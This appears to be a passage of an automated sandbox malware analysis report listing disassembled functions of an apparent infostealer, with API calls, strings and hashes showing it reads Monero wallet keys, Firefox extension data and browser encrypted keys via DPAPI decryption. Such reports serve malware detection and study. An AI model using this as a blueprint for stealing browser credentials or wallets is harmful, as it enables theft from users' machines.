lstrlen.KERNEL32(00000000), ref: 003CA6BC

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

DeleteFileA.KERNEL32(00000000), ref: 003CA743

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2138a9f94ea7443045c971c1bc1d440dec9f0e730813dacae51ef0ab08feeb5c
Instruction ID: d5b902f4b3e0599e5c357768460e075d3ee3698718f86b5066e5866c7f1e061d
Opcode Fuzzy Hash: 2138a9f94ea7443045c971c1bc1d440dec9f0e730813dacae51ef0ab08feeb5c
Instruction Fuzzy Hash: 51E132738105589ACB06FBA4EE92EEE7738BF14300F50815AF5177A191EF306A09DB66

Function 003CD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00E6B6C8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CD801
lstrlen.KERNEL32(00000000), ref: 003CD99F
lstrlen.KERNEL32(00000000), ref: 003CD9B3
DeleteFileA.KERNEL32(00000000), ref: 003CDA32

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 070804ca17928302c0bb80c8935dba547717523f5597e5a6fbfae20c9b8060a1
Instruction ID: 336815aae0fa268f46195f69a17cb6792a50daf2ac955d8334ea0a43a4900149
Opcode Fuzzy Hash: 070804ca17928302c0bb80c8935dba547717523f5597e5a6fbfae20c9b8060a1
Instruction Fuzzy Hash: 158128738105189BCB06FBA0ED52EEE7739BF14300F40412AF407AA191EF746A09DB66

Function 003CF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003E1580,003E0D92), ref: 003CF54C
lstrlen.KERNEL32(00000000), ref: 003CF56B

Strings

moz-extension+++, xrefs: 003CF5AD
^userContextId=4294967295, xrefs: 003CF59C

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 17e3d7b9e4c67bbadb457e58842f043cbc015bc73d1f20a4650a6568d21b9c49
Instruction ID: 8f2d0584e6a074727e368a28a784c4de6d03231c1e86e28d69576bc352fe7e9a
Opcode Fuzzy Hash: 17e3d7b9e4c67bbadb457e58842f043cbc015bc73d1f20a4650a6568d21b9c49
Instruction Fuzzy Hash: 7D514773D006489ADB05FBF0ED92DED7778AF54300F408529F8169B291EF346A19DBA2

Function 003D70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003D718C
s=, xrefs: 003D72AE, 003D7179, 003D717C
s=, xrefs: 003D7111

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: s=$s=$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-2558142500
Opcode ID: 7e12bcff5ec39a8e96a7d638c8b4dc78c70fbbb3af6fbf36135cde920bd76bfd
Instruction ID: 0f14b7e94721bb6d1998c57a1f703ecc1364f8c16592fa91413f26c3529bc652
Opcode Fuzzy Hash: 7e12bcff5ec39a8e96a7d638c8b4dc78c70fbbb3af6fbf36135cde920bd76bfd
Instruction Fuzzy Hash: CE5191B2C042189FDB15EBA0ED81BEEB774AF44304F1045AAE6157B281EB746F88CF55

Function 003C9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003C9D39

Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9AEF
Part of subcall function 003C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003C4EEE,00000000,?), ref: 003C9B01
Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9B2A
Part of subcall function 003C9AC0: LocalFree.KERNEL32(?,?,?,?,003C4EEE,00000000,?), ref: 003C9B3F

Part of subcall function 003C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C9B84
Part of subcall function 003C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003C9BA3
Part of subcall function 003C9B60: LocalFree.KERNEL32(?), ref: 003C9BD3

Strings

"encrypted_key":", xrefs: 003C9D30
DPAPI, xrefs: 003C9D89
, xrefs: 003C9DC1

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: e3dd4e79dd7f4a998eb5f982373da32bdfce0e973df411988f91600601ab4274
Instruction ID: f3e86aa89c2996f8d9e2aa90a4bdb8b20251f812884dae39473f85d5fa470094
Opcode Fuzzy Hash: e3dd4e79dd7f4a998eb5f982373da32bdfce0e973df411988f91600601ab4274
Instruction Fuzzy Hash: 71311EB6D10209ABCF05DBE4DD89FEEB7B8AB48304F15451EE906B7241E7319E04CBA1

Function 003D8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003E05B7), ref: 003D86CA
Process32First.KERNEL32(?,00000128), ref: 003D86DE
Process32Next.KERNEL32(?,00000128), ref: 003D86F3

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

CloseHandle.KERNEL32(?), ref: 003D8761

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: ce2e8a11d554f8b0399db17626b791ae9937bd40ec949a1da291337a113fcd98
Instruction ID: 71835566a8336b9fcc564a1edf9b9a3374d47c6a0454e4ef1681df4f4acc1aa5
Opcode Fuzzy Hash: ce2e8a11d554f8b0399db17626b791ae9937bd40ec949a1da291337a113fcd98
Instruction Fuzzy Hash: BF316D72901658ABCB26DF91ED41FEEB778FF45700F10419AE50AA62A0DB306E45CFA1

Function 003D6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E6A048,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003D6AE8
CloseHandle.KERNEL32(00000000), ref: 003D6AF9
Sleep.KERNEL32(00001770), ref: 003D6B04
CloseHandle.KERNEL32(?,00000000,?,00E6A048,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6B1A
ExitProcess.KERNEL32 ref: 003D6B22

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
